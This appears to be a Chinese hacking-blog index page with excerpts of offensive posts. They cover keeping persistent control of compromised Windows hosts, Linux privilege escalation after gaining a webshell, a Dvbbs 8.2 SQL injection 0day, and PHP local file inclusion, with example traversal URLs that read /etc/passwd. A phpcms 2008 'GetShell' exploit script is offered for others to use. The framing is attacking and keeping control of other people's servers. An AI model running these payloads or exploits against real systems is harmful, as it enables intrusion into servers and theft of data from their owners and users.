Windows 系统密码破解全攻略
此文章已发表在《黑客X档案》2009年第6期杂志上 后经作者发布在博客上,如转载请务必保留此信息! 引子 我一直在想,到底用什么样的方式才能较长时间地控制已经得到了权限的目标呢?留后门,种木马,甚至是Rootkit?留的Webshell痕迹太明显,哪怕是一句话的Webshell,都极容易被管理员清除。放了木马,也容易被有经验的管理员查出来,毕竟现在能做到无声无色的木马还是比较少。早期的是自己建个进...
一次LINUX低权限提权法
今天旁站拿到一个Apache/2.2.3 (CentOS)的SHELL,进去是LINUX系统,PHP版本5.2.17,MYSSQL的环境,没ASP,.NET组建 先用自带的命令LS,UNAME了下,无显,肯定是设置了PHP.INI。 根目录无写权限,估计就算反弹了也没法CHMOD 777了 先反弹试试 tmp里创建好文件,SHELL目录传马,执行,本地NC监听上线,WHOAMI一下,是WWWROO...
Dvbbs8.2 sql 版login.asp远程sql注入漏洞
今日在学PHP的时候,一个朋友给我发来一个站,让帮忙做个安检,发现站有个论坛是dvbbs的,呵呵,这可是个漏洞不断的家伙啊。。 最新版本的又暴了远程SQL注入漏洞! 下面提供该漏洞的分析及利用! 【漏洞描述】中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp 【漏洞分析】Login.asp 程序在检查隐藏...
php伪造本地文件包含漏洞
代码: <?php $page=$_GET[page]; include($page.'php'); ?> 你可以这样使用 https://www.webshell.cc/index.php?page=../etc/passwd https://www.webshell.cc/index.php?page=../../../etc/passwd http://w...
phpcms 2008最新0day加批量EXP
玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c EXP: #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ PHPCMS Remote Code Inject GetShell Exploit ...